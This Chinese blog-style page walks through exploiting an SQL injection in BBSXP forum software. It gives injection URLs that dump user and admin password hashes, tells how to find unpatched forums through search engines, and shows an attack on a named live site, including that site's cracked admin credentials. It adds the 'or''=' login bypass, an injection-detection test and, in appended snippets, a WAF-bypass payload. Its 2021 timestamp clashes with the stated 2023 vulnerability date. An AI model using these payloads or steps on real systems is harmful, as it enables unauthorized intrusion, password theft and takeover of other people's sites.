BBSXP最新漏洞 簡單注入檢測 萬能密碼

2021-04-02 02:55:52 字數 1901 閱讀 8260

bbsxp最新漏洞

漏洞日期:2023年7月1日

受害版本:目前所有bbsxp

漏洞利用:

查前台密碼注入語句:

blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5

查後台密碼注入語句:

blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5

首先開啟.google.com在輸入po......bbsxp5.15有很多這樣的論壇,隨便點個,好就這個bbs.yuntea.com 真幸運,這個站還沒打上補丁,一口做氣殺到底,bbsxp5.15最新漏洞 

漏洞主要出在blog.asp 可以讓直接構造資料庫命令  

blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 

後台區長的md5密碼就顯示出來了。 

前台密碼也可以出來, 

網上已經有相關動畫,軟體。 

就利用這個漏洞,肯定有一批bbsxp的**要倒下了 

接下來就是講工具了,準備好md5密碼破解器 

關於md5的破解,比較好使的有md5cracker速度增強版。 

1。先用8位或9位數字跑。很快。 

2。如果不行,用小寫字母跑。選擇5-6位比較好。 

3。再不行,說明密碼可能使字母加數字,可以碰碰運氣。可以配置乙個精品自典,比如10g的, 

跑上及幾個小時。(你的機器配置必須很好) 

4。再不行,建議放棄,太**了。 

前台ok...後台密碼..(注:你必須知道管理員的帳號) 

直接預設的配置就是直接拿下後台密碼... 

直接吧前台md5密碼暴出來。 

剩下的事就事破解md5了。 

現在開始進行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 

就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 

他的密碼是7cb2be65eb9f215215a0725a10b6e39e可能前台的密碼和後台一樣,如果有2個加密密碼那就是代表1個是前台的乙個是後台的,不多說了,看操作 

按照上面工具的介紹先用數字把, 

正在破===耐心等等 

我接條資訊,大家不介意把~ 

出來了,密碼是82246124,登入,,他的帳號是wzwu,密碼82246124,登入成功,後台登入,密碼82246124,登入成功,下面的因該知道把,我也就不多說了,以免遭到人家的痛罵。 

bbsxp5.15最新漏洞的原始作者不清

74d2710bd75c06a057e842c8ca55c576

名'or''='密碼也是'or''='

' 一般asp系統都有類似下面的url:http://.***.com/***.asp?id=××,我們只往在這樣的url後加上乙個單引號,如果返回伺服器錯誤資訊,那麼就說明了程式並沒有過濾單引號,而且從返回的錯誤資訊中的了可以得到伺服器的一些相關配置資訊。接著接交http:/.***.com/***.asp?id=××

1=2,如果返回的頁面不一樣,說明頁面可以注入。

KPPW最新版SQL注入漏洞一

kppw最新版sql注入一 kppw最新版sql注入一 檔案 control gy buyer order.php switch step if isset action else break default kekezu show msg 訪問頁面不存在 index.php 3,null,warn...

SQL注入漏洞全接觸 簡單介紹篇

隨著b s模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫 的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查詢 根據程式返回的結果,獲得某...

安全狗最新版V3 3繞過攔截注入漏洞

最新版安全狗的攔截過濾存在問題,導致可以繞過攔截進行注入 對於select from 的攔截可在 select 前後或中間插入 81 ff,即可繞過攔截注入如 id 1 20union 20sel 81ect 201,2 20from 20admin id 1 20union 20select 81...